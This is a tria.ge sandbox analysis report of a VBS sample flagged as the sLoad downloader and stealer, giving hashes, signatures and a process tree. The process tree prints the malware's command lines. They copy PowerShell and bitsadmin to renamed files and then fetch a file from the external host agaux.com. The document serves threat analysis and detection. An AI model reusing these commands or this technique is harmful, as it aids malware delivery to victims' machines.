Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

00SBLFNC71...0W.vbs

windows7_x64

10

00SBLFNC71...0W.vbs

windows10_x64

10

Analysis

  • max time kernel
    30s
  • max time network
    28s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    01/03/2021, 22:54 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    00SBLFNC71R18D160W.vbs

  • Size

    699B

  • MD5

    70053c798a635f12c002e57eacb3bd26

  • SHA1

    4cbe4c33fc5f44265e15bb6e583f46c878a97341

  • SHA256

    43202b6bcac9d8c195da84abee91ebd15ee80337421dc6e0eaa1c2e1481bb123

  • SHA512

    62652ceb291614da3b19be434fe3db7f1777e080b3e030c370cea1112dbd81a677a917ef356265bdeed732af89ebab6760cd7996179a477fe595ae4795402c69

Score
10/10
sloadstealertrojan

Malware Config

Signatures

  • sLoad

    sLoad is a PowerShell downloader that can exfiltrate system information and deliver additional payloads.

    trojanstealersload
  • Executes dropped EXE 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious use of WriteProcessMemory 13 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\00SBLFNC71R18D160W.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1828
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c cmd /c copy /Z c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\ProgramData\aREepkDUA.exe & cmd /c copy /Y /Z c:\Windows\SysWOW64\bi*.exe C:\ProgramData\lALIBfV*.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2016
      • C:\Windows\system32\cmd.exe
        cmd /c copy /Z c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\ProgramData\aREepkDUA.exe
        3⤵
          PID:1096
        • C:\Windows\system32\cmd.exe
          cmd /c copy /Y /Z c:\Windows\SysWOW64\bi*.exe C:\ProgramData\lALIBfV*.exe
          3⤵
            PID:1160
        • C:\ProgramData\lALIBfVin.exe
          "C:\ProgramData\lALIBfVin.exe" /wrap /transfer wyajDGCI https://agaux.com/ogoksi/SBLFNC71R18D160W/developer.txt C:\ProgramData\developer.txt
          2⤵
          • Executes dropped EXE
          PID:1948

      Network

      • flag-unknown
        DNS
        agaux.com
        Remote address:
        8.8.8.8:53
        Request
        agaux.com
        IN A
        Response
        agaux.com
        IN A
        185.156.172.44
      • 185.156.172.44:443
        agaux.com
        152 B
         3
      • 8.8.8.8:53
        agaux.com
        dns
        55 B
         71 B
         1
        1

        DNS Request

        agaux.com

        DNS Response

        185.156.172.44

      MITRE ATT&CK Enterprise v6

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • memory/1828-2-0x000007FEFB7F1000-0x000007FEFB7F3000-memory.dmp

        Filesize

        8KB

        Download

      • memory/1948-9-0x0000000076101000-0x0000000076103000-memory.dmp

        Filesize

        8KB

        Download

      We care about your privacy.

      This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.